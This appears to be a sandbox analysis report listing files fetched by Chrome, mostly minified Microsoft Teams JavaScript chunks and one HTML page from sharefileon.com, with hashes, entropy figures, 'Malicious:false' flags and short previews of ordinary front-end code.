                                                                                                                                                                                                                          SHA-512:55234BA8402662D0B17512F33F7F84B6E04FB77B4E212BAB41B6D6941AB1AE98218766AB7532D362C61E3925E7B6C3DA1BCC853337046E9EFD97D2782E6D73C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52085],{848020:(e,t,a)=>{a.d(t,{aS:()=>i,a7:()=>n,as:()=>o,Mb:()=>r,el:()=>s,Av:()=>l,nb:()=>c,Jw:()=>m,hz:()=>d,gs:()=>g,p8:()=>p,cy:()=>u,O:()=>h});const i={Anonymous:"Anonymous",Aad:"Aad",Msa:"Msa",MsaLife:"MsaLife",GFed:"GFed",Otp:"Otp"},n={Member:"Member",Anonymous:"Anonymous",Guest:"Guest"},o={Default:"Default",Mto:"Mto",Ccm:"Ccm",Eotp:"Eotp"};var r;!function(e){e[e.Member=0]="Member",e[e.Guest=1]="Guest",e[e.Anonymous=2]="Anonymous",e[e.CrossCloudMeeting=3]="CrossCloudMeeting"}(r||(r={}));const s={prod:"prod",life:"life",dod:"dod",gcch:"gcch",gallatin:"gallatin",airgap08:"airgap08",airgap09:"airgap09"};var l,c,m,d,g,p,u,h;!function(e){e.prod="Global",e.gcch="microsoftonline.us",e.dod="microsoftonline.mil",e.gallatin="partner.microsoftonline.cn",e.gcc="gcc.microsoftonline.com",e.ag08="eaglex.ic.gov",e.ag09="microsoft.scloud"}(l||(l={})),function(e){e.prod="login.microso
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (40348)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):40455
                                                                                                                                                                                                                          Entropy (8bit):4.981394252256148
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:fnQ86Ufu2oo9KiHjtwTV0ayEwiT1U7lPFYeJ4Z02dWAyGPORt1PnV6gPnn4PFKM2:mUfu2oo9KCt1lgdWAyGPOdPnn+YTB
                                                                                                                                                                                                                          MD5:E36FE8288B6CC5FB216E1821E77BAD47
                                                                                                                                                                                                                          SHA1:0A718845E742538C25C859F2AD0CCB2E7AF4DE5F
                                                                                                                                                                                                                          SHA-256:9A01B2E8807963179A99AC8E6B5DA79A32CB33D9EE206B02EEA1893AC79FDA37
                                                                                                                                                                                                                          SHA-512:55234BA8402662D0B17512F33F7F84B6E04FB77B4E212BAB41B6D6941AB1AE98218766AB7532D362C61E3925E7B6C3DA1BCC853337046E9EFD97D2782E6D73C7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/52085-aa1e2134d5b41b9f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52085],{848020:(e,t,a)=>{a.d(t,{aS:()=>i,a7:()=>n,as:()=>o,Mb:()=>r,el:()=>s,Av:()=>l,nb:()=>c,Jw:()=>m,hz:()=>d,gs:()=>g,p8:()=>p,cy:()=>u,O:()=>h});const i={Anonymous:"Anonymous",Aad:"Aad",Msa:"Msa",MsaLife:"MsaLife",GFed:"GFed",Otp:"Otp"},n={Member:"Member",Anonymous:"Anonymous",Guest:"Guest"},o={Default:"Default",Mto:"Mto",Ccm:"Ccm",Eotp:"Eotp"};var r;!function(e){e[e.Member=0]="Member",e[e.Guest=1]="Guest",e[e.Anonymous=2]="Anonymous",e[e.CrossCloudMeeting=3]="CrossCloudMeeting"}(r||(r={}));const s={prod:"prod",life:"life",dod:"dod",gcch:"gcch",gallatin:"gallatin",airgap08:"airgap08",airgap09:"airgap09"};var l,c,m,d,g,p,u,h;!function(e){e.prod="Global",e.gcch="microsoftonline.us",e.dod="microsoftonline.mil",e.gallatin="partner.microsoftonline.cn",e.gcc="gcc.microsoftonline.com",e.ag08="eaglex.ic.gov",e.ag09="microsoft.scloud"}(l||(l={})),function(e){e.prod="login.microso
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9937)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):10044
                                                                                                                                                                                                                          Entropy (8bit):5.444279096330454
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:1QgZfOfW6LKNLIDepX+gQ8LOapl1KzL16tnpA8Ckh9Hd+4keq4PBH4UGNfRoLyL8:tGrGhISpX+g3Bv4apvCkjdjDq4J471RM
                                                                                                                                                                                                                          MD5:2B4C497D3F89CB23052BE40DA7B4FD82
                                                                                                                                                                                                                          SHA1:D55BEF6FB11CBB81BD08144BA1A61DD2EBFEB5E6
                                                                                                                                                                                                                          SHA-256:2DCCF9898681979FAB08FE15530549519F86519818E9154BFB74D4CC6F98B46E
                                                                                                                                                                                                                          SHA-512:06960A5C1F31359E13B29A988751A60C928D8CE2AC854B5B0F36B220EF49B449E27B17D1AE4835F8A47CB8ED9EA8C0DB86C5F67B7C304A62B3FB32B2404F2A7F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[57627],{184027:(e,t,r)=>{r.d(t,{q:()=>o});var n=r(513432),a=r(691505),o=function(e){var t,r=n.createContext({value:{current:e},version:{current:-1},listeners:[]});return r.Provider=(t=r.Provider,function(e){var r=n.useRef(e.value),o=n.useRef(0),s=n.useRef();return s.current||(s.current={value:r,version:o,listeners:[]}),(0,a.E)((function(){r.current=e.value,o.current+=1,(0,a.H)((function(){s.current.listeners.forEach((function(t){t([o.current,e.value])}))}))}),[e.value]),n.createElement(t,{value:s.current},e.children)}),delete r.Consumer,r}},963300:(e,t,r)=>{r.d(t,{F:()=>s});var n=r(513432),a=r(691505),o=r(783943);const s=(e,t)=>{const r=n.useContext(e),{value:{current:s},version:{current:c},listeners:l}=r,i={};Object.keys(t).forEach((e=>{i[e]=t[e](s)}));const[u,d]=n.useState([s,i]),m=e=>{d((r=>{if(!e)return[s,i];if(e[0]<=c){return Object.keys(t).every((e=>Object.is(r[1][e],i[
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2208)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):2316
                                                                                                                                                                                                                          Entropy (8bit):4.861015852238033
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3xv08PIo+iBj54nWJy5PIm7HjnhSJyVR0K5m:IqQiYWY+qHjhSYVR9Q
                                                                                                                                                                                                                          MD5:8A95CDB621AC696E7DC73F945C5E028D
                                                                                                                                                                                                                          SHA1:912AD9D60D0D78C8CBAFD355014EBBE714A162EE
                                                                                                                                                                                                                          SHA-256:6A8270DB58C60E1C6B94EF0CF99FB2693EE00D6AA5FDC1D7CF3B5224935F3F9B
                                                                                                                                                                                                                          SHA-512:FF88C3A0C969660D74F810B8E0CF56CA9780DD696ACDF86E007A4846763F02FAACFFE6447631F7F45612B2F106F82EC48E6E4A5521DB8266645A37679BB9F711
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/169767-cde234dc0bbb0b5b.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169767],{169767:(e,C,t)=>{t.d(C,{d:()=>r});var a=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:l()(n.Q.outline,C.outlinePart)},a.createElement("path",{d:"M9.51562 6C9.23948 6 9.01562 6.22386 9.01562 6.5C9.01562 6.77614 9.23948 7 9.51562 7H12.2929L8.14645 11.1464C7.95118 11.3417 7.95118 11.6583 8.14645 11.8536C8.34171 12.0488 8.65829 12.0488 8.85355 11.8536L13 7.70711V10.4844C13 10.7605 13.2239 10.9844 13.5 10.9844C13.7761 10.9844 14 10.7605 14 10.4844V6.5C14 6.22386 13.7761 6 13.5 6H9.51562ZM12.7656 17C14.0136 17 15.0481 16.0855 15.2354 14.8901C16.2572 14.5761 17 13.6248 17 12.5V5.5C17 4.11929 15.8807 3 14.5 3H7.5C6.36321 3 5.40363 3.75875 5.10007 4.79744C3.90947 4.98887 3 6.02104 3 7.26562
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):167639
                                                                                                                                                                                                                          Entropy (8bit):4.858684438148318
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:p6ob04md1hDTyPRd5/xTLl0FdhsB74x1gh:S4AhDTyPRd5/0FdhS74/I
                                                                                                                                                                                                                          MD5:80956E886E915A4EC4DC2FFC3826775A
                                                                                                                                                                                                                          SHA1:A02B290EA4BF1CC8E7D75C41C45F378B6813ABCC
                                                                                                                                                                                                                          SHA-256:12E65ED053EB2AB71EFCEA5FF41648D64CB49AAD5CA7F1C806EFE33CD8B43048
                                                                                                                                                                                                                          SHA-512:9A6A13ACD652F0FC6744DEF36F8F736FCED5FAB3B818256C9015CA39E38C9D0E44AA3C16C8B281E4EC8259C5C715B98A90584013FDBA8AAC515B1F0F372795B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/802756-ff6932200fc249b5.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[802756],{802756:(e,t,a)=>{var o;function i(e={},t){return new Proxy(e,{get:(e,a)=>t?a in e?e[a]:t(String(a)):String(a)})}a.d(t,{SQ:()=>o,Cu:()=>n,BQ:()=>r}),function(e){e[e.Expanded=1]="Expanded",e[e.ExpandedAndPacked=2]="ExpandedAndPacked",e[e.Packed=3]="Packed"}(o||(o={}));const _=e=>e.replace(/[A-Z]/g,((e,t)=>0===t?e.toLowerCase():`_${e.toLowerCase()}`)),n=i({SliceSwitch:"activity_slice_switch",FeedListRendered:"feeds_focused_load",FeedListLoadNext:"feeds_focused_load_more",SlicesFeedListRendered:"slices_feeds_focused_load",SlicesFeedListLoadNext:"slices_feeds_focused_load_more",ActivityNameSpaceLoadScenario:"feeds_store_feed_item_namespace_load",AMSMemoryCachePrune:"ams_memory_cache_prune",GetAppPreviewResult:"ext_get_app_preview_result_appbasedlink",AppBasedLink:"ext_app_based_link",AppBasedLinkFetchAppDetails:"ext_app_based_link_fetch_app_details",AppBasedLinkChangedToo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (18335)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):18444
                                                                                                                                                                                                                          Entropy (8bit):5.4219475958291286
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:S0xnbFFqEuCnA8oUWVZtpcpWq4si9exVHreCOLEJny:S0xnbFFqb8jqZtkxVHreCOLEJy
                                                                                                                                                                                                                          MD5:D9EDC1D501F5631A7C4E7C37B1AC280A
                                                                                                                                                                                                                          SHA1:CD94885FEFF710323427C8BAF5850F982FC22890
                                                                                                                                                                                                                          SHA-256:1D60EF14C462EAC63FC9546DDEF168A9BF2F86DE4F148D8F253A0D96D284FB75
                                                                                                                                                                                                                          SHA-512:9966A040C7C492ADCD0F13E7CF6369719A638ADCC80D9F6107038030E968E622C8E1DB74B9321D040450F5B2CB76187E31F4726D0149E52B665CF966A2C10CB0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/52196-c82deace0372cca0.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52196],{946187:(e,o,r)=>{r.d(o,{C:()=>t});const t={auto:"auto",belowBase:-1,base:0,overBase:1,topOfBase:2,belowSurfaces:3,surfaceMenu:1e3,backdrop:1e3,callout:1e3,tooltip:1010,searchBox:1010,searchBoxSurfaceMenu:1010,monitor:1e3,shell:1030}},742692:(e,o,r)=>{r.d(o,{PtS:()=>a});var t=r(693593);const a={borderColor:t.Pt.borderColor,borderStyle:t.Pt.borderStyle,borderWidth:t.Pt.borderWidth}},820152:(e,o,r)=>{r.d(o,{T:()=>t});const t={v9Icon:()=>({"& svg":{width:"100%",paddingBottom:"100%",margin:"-4px 0 0 -4px",overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},"& .fui-Icon-regular":{display:"none"}}}),v9CustomSizeIcon:()=>({"& svg":{overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):167639
                                                                                                                                                                                                                          Entropy (8bit):4.858684438148318
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:p6ob04md1hDTyPRd5/xTLl0FdhsB74x1gh:S4AhDTyPRd5/0FdhS74/I
                                                                                                                                                                                                                          MD5:80956E886E915A4EC4DC2FFC3826775A
                                                                                                                                                                                                                          SHA1:A02B290EA4BF1CC8E7D75C41C45F378B6813ABCC
                                                                                                                                                                                                                          SHA-256:12E65ED053EB2AB71EFCEA5FF41648D64CB49AAD5CA7F1C806EFE33CD8B43048
                                                                                                                                                                                                                          SHA-512:9A6A13ACD652F0FC6744DEF36F8F736FCED5FAB3B818256C9015CA39E38C9D0E44AA3C16C8B281E4EC8259C5C715B98A90584013FDBA8AAC515B1F0F372795B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[802756],{802756:(e,t,a)=>{var o;function i(e={},t){return new Proxy(e,{get:(e,a)=>t?a in e?e[a]:t(String(a)):String(a)})}a.d(t,{SQ:()=>o,Cu:()=>n,BQ:()=>r}),function(e){e[e.Expanded=1]="Expanded",e[e.ExpandedAndPacked=2]="ExpandedAndPacked",e[e.Packed=3]="Packed"}(o||(o={}));const _=e=>e.replace(/[A-Z]/g,((e,t)=>0===t?e.toLowerCase():`_${e.toLowerCase()}`)),n=i({SliceSwitch:"activity_slice_switch",FeedListRendered:"feeds_focused_load",FeedListLoadNext:"feeds_focused_load_more",SlicesFeedListRendered:"slices_feeds_focused_load",SlicesFeedListLoadNext:"slices_feeds_focused_load_more",ActivityNameSpaceLoadScenario:"feeds_store_feed_item_namespace_load",AMSMemoryCachePrune:"ams_memory_cache_prune",GetAppPreviewResult:"ext_get_app_preview_result_appbasedlink",AppBasedLink:"ext_app_based_link",AppBasedLinkFetchAppDetails:"ext_app_based_link_fetch_app_details",AppBasedLinkChangedToo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (46888)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):46996
                                                                                                                                                                                                                          Entropy (8bit):5.108957386891247
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ah4GRVGB3+pCxxesNuoDEcv9FLuCn+MAr7F4wZZMxhD:wSe6fDEoLuVMArLZZMxx
                                                                                                                                                                                                                          MD5:B318139959F84BFCD9194D8BBA1F1797
                                                                                                                                                                                                                          SHA1:48A05E8B5EBDB233C28F154AAFB164903ACEBF21
                                                                                                                                                                                                                          SHA-256:9782CDAE931F663CDFC8BBCDE6A7C99B872B6382661863D7E96C76F075469063
                                                                                                                                                                                                                          SHA-512:B340FA47578450E78009080790C0412251A9171E532ABBC9EF7ED65AAA200968E3A7B68242F85A401657E28BBDBD9A979E2544755BC752ED431BD937D3CA6FE1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/183153-1c9db25c40ee158a.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[183153],{878709:(e,t,n)=>{e.exports=n(765583)},140906:(e,t,n)=>{var o=e.exports=n(490627),r=/\s+/,i={};o.Callbacks=function(e){e="string"==typeof e?i[e]||function(e){var t=i[e]={};return o.each(e.split(r),(function(e,n){t[n]=!0})),t}(e):o.extend({},e);var t,n,a,c,s,l,u=[],d=!e.once&&[],p=function(o){for(t=e.memory&&o,n=!0,l=c||0,c=0,s=u.length,a=!0;u&&l<s;l++)if(!1===u[l].apply(o[0],o[1])&&e.stopOnFalse){t=!1;break}a=!1,u&&(d?d.length&&p(d.shift()):t?u=[]:g.disable())},g={add:function(){if(u){var n=u.length;!function t(n){o.each(n,(function(n,r){var i=o.type(r);"function"===i?e.unique&&g.has(r)||u.push(r):r&&r.length&&"string"!==i&&t(r)}))}(arguments),a?s=u.length:t&&(c=n,p(t))}return this},remove:function(){return u&&o.each(arguments,(function(e,t){for(var n;(n=o.inArray(t,u,n))>-1;)u.splice(n,1),a&&(n<=s&&s--,n<=l&&l--)})),this},has:function(e){return o.inArray(e,u)>-1},empty:function()
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (45648)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):45756
                                                                                                                                                                                                                          Entropy (8bit):5.2858332742140535
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:cYSBClBRobRhWi66Ue2zWDm29skdvjWtqa/:sBcot+/3Gl9sk9j1O
                                                                                                                                                                                                                          MD5:9B765778CB780454FA7573AF688508EF
                                                                                                                                                                                                                          SHA1:63A180A192017925F9D8B7C75992C94D597B8A61
                                                                                                                                                                                                                          SHA-256:B8B6D274F481B81DE9E0BF1A9891133DF8848DED39376CC6AA5CECA455CD3E7F
                                                                                                                                                                                                                          SHA-512:73A25A2BF82DCC41D057BE697305463863EEE7704590CFDDF00B271AEE2630233F10FB94C3928FD132D31475E1A3C1CDFCA5DA4BC3F1EDA9C68B37E5953662DD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/320494-30cfac786d71789c.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[320494],{320494:(e,t,n)=>{n.d(t,{ms:()=>Ge,Hu:()=>Qe,ik:()=>Ue});var o=n(150321),r=n(89968),i=n(29213),a=n.n(i),s=n(200727),l=n.n(s),u=n(61997),c=n.n(u),d=n(445299),p=n.n(d),f=n(883343),h=n.n(f),g=n(112882),m=n.n(g),v=n(109161),y=n.n(v),I=n(565316),b=n.n(I),w=n(189544),C=n.n(w),S=n(848870),x=n.n(S),P=n(37838),k=n.n(P),O=n(26084),A=n.n(O),E=n(996665),D=n(301078),T=n(152450),R=n(121121),_=n(799323),H=n(31828),K=n(182812),M=n(338400),N=n(900046),B=n(992758),V=n(936666),L=n(953543),j=n(182227),F=n(513432),Q=n(62600),U=n.n(Q),G=n(395225),J=n.n(G),W=n(770246),z=n(786244),Z=n(90278),q=(n(164391),0);function X(e){return"function"==typeof e?e:$}function $(){}function Y(e,t){null!==e&&(0,W.A)(e,{boundary:t,block:"nearest",scrollMode:"if-needed"}).forEach((function(e){var t=e.el,n=e.top,o=e.left;t.scrollTop=n,t.scrollLeft=o}))}function ee(e,t){return e===t||e.contains&&e.contains(t)}fun
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21424)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21532
                                                                                                                                                                                                                          Entropy (8bit):5.515475146072575
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:Z26FtV+V/B8eYTOr05ycr2m25YGkRkUaPLG9KTCLITX25YoqSisHDLuwOz2zCnC9:k6Ft6DAy05ycam25jCSaQCUTX25bqSZD
                                                                                                                                                                                                                          MD5:A635CC58B3B71104A5BB2E3EB03D1E9F
                                                                                                                                                                                                                          SHA1:16300799F5B845839A6526A26BCB045BCE3B9393
                                                                                                                                                                                                                          SHA-256:56ABB9053A8E30042F9A25D00C2AD21AB9343F37FC22A5A478A93C0B743457BA
                                                                                                                                                                                                                          SHA-512:F30AAD92B56739C2CACAF41541CDA656BF049BCB946574CFA6E0A5CD623944427214B6EEA210AE4321376ED1951CE6F3EAA0B33E4031C06061181E79F939CD8D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[471294],{998783:(e,t,n)=>{n.d(t,{S:()=>F});var r=n(513432),o=n(733071),a=n(589256),i=n(531389),l=n(411947),s=n(164093),c=n(602835),f=n(478304),u=n(716300),d=n(750818),p=n(119068),v=n(499319),m=n(483851),g=n(762612);var b=n(644525),h=n(854130);var B=n(103735),y=n(965804),q=n(526521);const w="fui-Checkbox",j="fui-Checkbox__label",k="fui-Checkbox__input",z="fui-Checkbox__indicator",x=(0,B.D)("r1q22k1j","r18ze4k2"),O=(0,y.O)({unchecked:{Bi91k9c:"f3p8bqa",pv5h1i:"fium13f",lj723h:"f1r2dosr",Hnthvo:"f1729es6"},checked:{sj55zd:"f19n0e5",wkncrt:"f35ds98",zxk7z7:"f12mnkne",Hmsnfy:"fei9a8h",e6czan:"fix56y3",pv5h1i:"f1bcv2js",qbydtz:"f7dr4go",Hnthvo:"f1r5cpua"},mixed:{sj55zd:"f19n0e5",Hmsnfy:"f1l27tf0",zxk7z7:"fcilktj",pv5h1i:"f1lphd54",Bunfa6h:"f1obkvq7",Hnthvo:"f2gmbuh",B15ykmv:"f1oy4fa1"},disabled:{Bceei9c:"f158kwzp",sj55zd:"f1s2aq7o",Hmsnfy:"f1w7mfl5",zxk7z7:"fcoafq6",Bbusuzp:"f1dcs8
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33656)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):33764
                                                                                                                                                                                                                          Entropy (8bit):5.60156438987075
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:uaEXiN3NpnQ2o+H7RyZTG76kQ3vIJ7lulJbjlNUXM0PSro5h/mF0nDS9w7fv/hxj:uKN3NpnQ2oY8pG7G3vabDJj0zytd
                                                                                                                                                                                                                          MD5:D010EF6AEC4927AB3BB5049C00D70842
                                                                                                                                                                                                                          SHA1:9D23110792583AAF46063E62006CFF812A81549A
                                                                                                                                                                                                                          SHA-256:9FF10088E9376E32B8657F7B51092829F068D89B65B8AF472AF59C87A82DD68A
                                                                                                                                                                                                                          SHA-512:243BE3C3E79BE17165A2B7561E8534997DD57B9B04E314544965378CA1BC4E01F0BDFA8A5AD63C3F67D7F2DD724F775ABDD55B0D9F082FDFD5969C5514854081
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900516],{111631:(e,t,r)=>{function i(e,t){var r=t&&t.cache?t.cache:l,i=t&&t.serializer?t.serializer:u;return(t&&t.strategy?t.strategy:a)(e,{cache:r,serializer:i})}function n(e,t,r,i){var n,s=null==(n=i)||"number"==typeof n||"boolean"==typeof n?i:r(i),o=t.get(s);return void 0===o&&(o=e.call(this,i),t.set(s,o)),o}function s(e,t,r){var i=Array.prototype.slice.call(arguments,3),n=r(i),s=t.get(n);return void 0===s&&(s=e.apply(this,i),t.set(n,s)),s}function o(e,t,r,i,n){return r.bind(t,e,i,n)}function a(e,t){return o(e,this,1===e.length?n:s,t.cache.create(),t.serializer)}r.d(t,{A:()=>i,W:()=>h});var u=function(){return JSON.stringify(arguments)};function c(){this.cache=Object.create(null)}c.prototype.get=function(e){return this.cache[e]},c.prototype.set=function(e,t){this.cache[e]=t};var l={create:function(){return new c}},h={variadic:function(e,t){return o(e,this,s,t.cache.create(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):266
                                                                                                                                                                                                                          Entropy (8bit):5.182741116673583
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:F9oNS2BSyRbWsCJwvYtMe1mGHr9EJiKWaO6SZF:HgS2BSyEsCJB1THr+pWIS7
                                                                                                                                                                                                                          MD5:8578A331AD09BB2EF6359FEC3916BEFC
                                                                                                                                                                                                                          SHA1:38B68F5C02CBDB6E29C50F8858710E0392B0B8D6
                                                                                                                                                                                                                          SHA-256:3D7E7552E3801941A408C504AA732223FE2BED5D12E248680847D772182CB639
                                                                                                                                                                                                                          SHA-512:B034DDDA04F8DEE0D174651D13A89AF9FE5ED28E1E81FAB229AFA119B9B0A9C418E324FFCE28E909D8D596BEAE98FA1AC0BA09C74E7E7689B945C032088C5E18
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_react_commonjs-external-a1351e34.js",["exports"],(function(e){"use strict";const n=global.React||guac.react;e._=n})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_react_commonjs-external-a1351e34.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7060)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):49460
                                                                                                                                                                                                                          Entropy (8bit):5.559759227741801
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:r0DbUO6gccy7nIij6ftS4ZimMK4fhSY/Su35/PkQbmh1Zp8:r0DbUOtP6N/PkQbq1Zp8
                                                                                                                                                                                                                          MD5:0FEA5100727B24E27195E1CD4E06190E
                                                                                                                                                                                                                          SHA1:A807CE13F172FB2A9BB1AD995EB3E8837B48420D
                                                                                                                                                                                                                          SHA-256:1DA48A1034C93C091DFCECE66987B7E16FDC519C0FC68B3057C692017B28EA00
                                                                                                                                                                                                                          SHA-512:F1D8D88C18085914E5987F69F6F7BD968ADDC410E966ABE0EACDBB5504E1E112CE285EAFE6964FF4C3276CE932B877BAA4B0EF9537606FB4D1D54BF14B185B8C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://sharefileon.com/
